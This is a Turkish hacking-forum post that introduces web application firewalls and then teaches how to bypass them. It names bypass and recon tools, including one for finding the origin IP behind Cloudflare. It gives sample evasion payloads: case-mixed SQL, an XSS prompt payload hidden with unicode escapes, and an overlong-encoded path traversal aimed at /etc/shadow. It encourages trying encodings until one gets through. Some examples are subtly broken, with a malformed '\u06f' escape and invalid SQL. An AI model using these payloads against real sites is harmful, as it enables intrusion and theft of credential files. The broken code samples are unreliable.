WAF (Web Application Firewall) nedir?

thefirvon

Üye
29 Haz 2022
161
40
FW5XkUc.png


Merhaba TürkHackTeam Ailesi​
WAF nedir?
WEB uygulama güvenlik duvarı, bir WAF web uygulamasındaki ağ saldırılarını algılamak ve engellemek için tasarlanmış bir dizi monitör ve filtiredir.
goUm2FK.png
Biz Şirketlere, WAF’ın bir bilgi koruma aracı olmadığı konusunda bilgilendirmeliyiz. Peki amma niye ? Arkadaşlar WAF bir web uygulamasının genel güvenlik sistemine HTTP/HTTPS dişında protokollerin sorunlarını çözen, olay kontrol sistemleri ve dolandırıcılık önleme hizmetleri gibi diğer unsurlarla birlikte dahil edile bilir.

WAF kullanmanın nedenleri
  1. Derinlemesine Savunma yaklaşımı
  1. Savunmasız web uygulamalarına yönelik saldırıları algılar ve engeller
  1. Çeşitli güvenlik açıklarına karşı koruma sağlar
  1. Bir şirketin web ortamını korur.
Popüler WAF satıcıları
lj8Ws4r.png

Baypas Yapmak İçin Araçlar:
w3af — Web Uygulama Saldırısı ve Denetim Çerçevesi
8JssNBR.png
w3af - Open Source Web Application Security Scanner

wafw00f — Web Uygulaması Güvenlik Duvarını tanımlayın ve parmak izini sürün​
lbyFZl4.png
GitHub - EnableSecurity/wafw00f: WAFW00F allows one to identify and fingerprint Web Application Firewall (WAF) products protecting a website.

CloudFail – Cloudflare WAF'ın arkasındaki orijinal IP adresini bulmaya çalışan taktiksel bir keşif aracıdır.​
G2bX7Zk.png
goUm2FK.png
WAF baypas etme teknikleri:
Genel Talep:

SELECT * FROM * WHERE OWNER = 'NAME_OF_DB'
Genel talep dediyim buradan anladımız üzere web sayfasına gönderdimiz talepler böyledir ama bu talepler WAF tarafından engelenir
Bypass Tekniği:
sELeCt * fRoM * wHerE OWNER = 'NAME_OF_DB'
Gördüyümüz gibi Harifleri Büyük küçük yaparsak, ASCII karakterleri, WAF atlamak için bize harika değişkenler sağlar
Sonuç almak için yükün tamamını veya bir kısmını değişin.
Genel talep:
<marquee onstart=prompt()>

Bypass Tekniği:
<marquee onstart=\u0070r\u06f\u006dpt()>

Genel Talep:
../../etc/shadow
Bypass Tekniği:
%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFshadow
SZDZeP5.png
Bunu unutmayın ki, Birçok web uygulaması, farklı kodlama türlerini destekler ve kodlamayı yorumlabilir, WAF’ın tüm sorunlar için her derde deva olmadığını unutmayın, Her zaman farklı kodlama teknikleri deneyin, bazıları çalışacaktır.
fbFJM0r.png
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.